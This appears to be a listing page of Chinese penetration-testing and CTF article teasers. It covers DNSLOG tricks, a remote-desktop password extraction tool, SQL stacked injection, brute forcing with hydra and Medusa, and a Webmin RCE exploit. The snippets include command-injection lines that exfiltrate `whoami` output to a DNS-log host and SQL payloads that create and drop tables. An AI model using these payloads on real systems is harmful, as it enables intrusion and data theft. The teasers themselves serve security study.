0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...
01月25日65 views评论com
http
渗透测试-DNSLOG使用技巧
01月25日65 views评论com
http
01月25日65 views评论com
http
用 Python 从头搭建一个在线聊天室
点击上方“萝卜大杂烩”,选择“星标”公众号超级无敌干货,第一时间送达!!!今天从头开始做一个在线聊天网站,网上各种各样的聊天工具已经很多了,为啥还要做这么一个聊天工具呢,无他,兴趣耳!今天先完成第一部...
01月23日24 views评论flask
password
一款针对向日葵的识别码和验证码提取工具
项目地址https://github.com/wafinfo/Sunflower_get_Password免责声明由于传播、利用Sunflower_get_Password工具提供的功能而造成的任何直...
01月20日319 views评论get
公众号
【Android 原创】安卓协议逆向之frida hook百例二
作者论坛账号:xiaoc996来自11日开放注册刚加入同学的第二帖。安卓协议逆向之frida hook百例二各位大佬好 我是一位往Android安全方向走的小菜鸟一枚 目前也是很努力在学 这个系列也会...
01月19日42 views评论data
代码
SQLi_Labs-4.Stacked Injections
4.Stacked InjectionsLess-39堆叠注入,成功创建test39数据表1;create table test39 like users;%23删除test39数据表1;drop t...
01月18日54 views评论password
test
【原创】CTFShow—F5杯(web篇)
[huayang] eazy-unserialize <?php include "mysqlDb.class.php"; class ctfshow{ public $method; publ...
01月01日47 views评论sql
user
beescms代码审计学习(一)
免责声明由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即...
12月17日152 views评论admin
user
密码破解——在线破解(hydra、Medusa )
密码破解——在线破解(hydra、Medusa )前言在线破解把字典里的逐个往服务器里去试主要学习hydra和medusa1、hydra九头蛇(工具名字真的一个比一个有趣)速度快、功能强大、稳定性差h...
12月12日安全工具92 views评论file
password
【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞
0x01 简介—————Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的GitHub...
12月08日64 views评论cve
web
【原创】记一次ctf实战—— 0CTF-2016-Web-piapiapia(失败)
[huayang] 老样子,进去看看 看看有没有注入 这提示看着就不像有过滤的,会不会像那次做的那题一样是泄露呢BDJCTF-2020-Web-easy_search 扫一下子域名 哇,貌似有好东西 ...
12月03日43 views评论filter
password
【原创】ctfshow—web入门—爆破(21-28)
web21 [huayang]base64的形式 把文件转位base64 #! /usr/bin/env python3 # _*_ coding:utf-8 _*_ import base64 # ...
12月03日33 views评论file
web
【原创】CTFShow—F5杯(web篇)
[huayang] eazy-unserialize <?php include "mysqlDb.class.php"; class ctfshow{ public $method; publ...
12月03日25 views评论sql
user
19